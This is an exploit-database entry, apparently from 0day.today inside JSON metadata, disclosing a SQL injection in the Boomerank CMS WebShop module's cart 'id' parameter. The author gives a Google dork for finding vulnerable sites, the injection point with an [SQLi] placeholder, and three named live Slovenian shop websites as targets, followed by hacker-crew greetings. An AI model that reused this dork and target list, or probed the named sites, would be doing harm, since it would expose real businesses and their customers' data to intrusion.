Boomerank CMS WebShop-module SQL Injection

2012-03-28T00:00:00

Description

Exploit for php platform in category web applications

{"id": "1337DAY-ID-17850", "type": "zdt", "bulletinFamily": "exploit", "title": "Boomerank CMS WebShop-module SQL Injection", "description": "Exploit for php platform in category web applications", "published": "2012-03-28T00:00:00", "modified": "2012-03-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/17850", "reporter": "mr.5p0ng3", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-21T01:35:15", "viewCount": 8, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://0day.today/exploit/17850", "sourceData": "# Exploit Title: Boomerank CMS WebShop-module SQL Injection Vuln.\r\n# Date: 28.03.2012\r\n# Google Dork: inurl:\"vozicek-dodaj.html?id=\" site:.si \r\n# Author: Mr.5p0ng3 [[email\u00a0protected]]\r\n# Software Link: www.boomerank.net (Author's website)\r\n# Version: All\r\n# Tested on: Linux\r\n# Running on: Apache 2.2.3\r\n\r\n#[0x1] - About\r\n\r\n Boomerank is a CMS which can also be used for webstore because it is highly modular by design. \r\nIt is also compatible or specially designed for use with DataLab Pantheon Information System.\r\n \r\n#[0x2] - Vulnerability\r\n\r\nI have identified 3 SQLi vulnerabilities. 2 are inconclusive since they don't affect every setup or project in same manner.\r\nIn some cases the variable is sanitized in some not!\r\nTherefore I will not go into details with those particular vulnerabilities.\r\n\r\nVulnerability 1:\r\n\r\nWebShop module has a function that allows adding item to shopping cart.(icon \"V vozi\u010dek\")\r\n\r\nhttp://someurl/vozicek-dodaj.html?id=1' + [SQLi] \r\n\r\n#[0x3] - Live website examples\r\n\r\nhttp://www.pigo.si/vozicek-dodaj.html?id=[SQLi]\r\nhttp://www.naredisisam.si/vozicek-dodaj.html?id=[SQLi]\r\nwww.vedaena.si/vozicek-dodaj.html?id=[SQLi]\r\n....\r\n\r\n#[0x4] - Notes\r\n\r\nNothing to say...\r\n\r\n#[0x5] - Greetz n shit ###################################################\r\n# Special thanks and greetz goes to 1337day Inj3ct0r team and staff. #\r\n# .......................................................................#\r\n# How about a theme song now?Here it goes...Bounce bounce bounce!! #\r\n# Ooooohhhhhhhhhhhh, who lives in the code just under hardware? #\r\n# mr5p0ng3 bob hacker pants!!!!!! #\r\n# .......................................................................# \r\n##########################################################################\r\n//Mr.5p0ng3//[email\u00a0protected]//\r\n\r\n\n\n# 0day.today [2018-02-20] #", "_state": {"dependencies": 1646909706, "score": 1659766679, "epss": 1678811959}}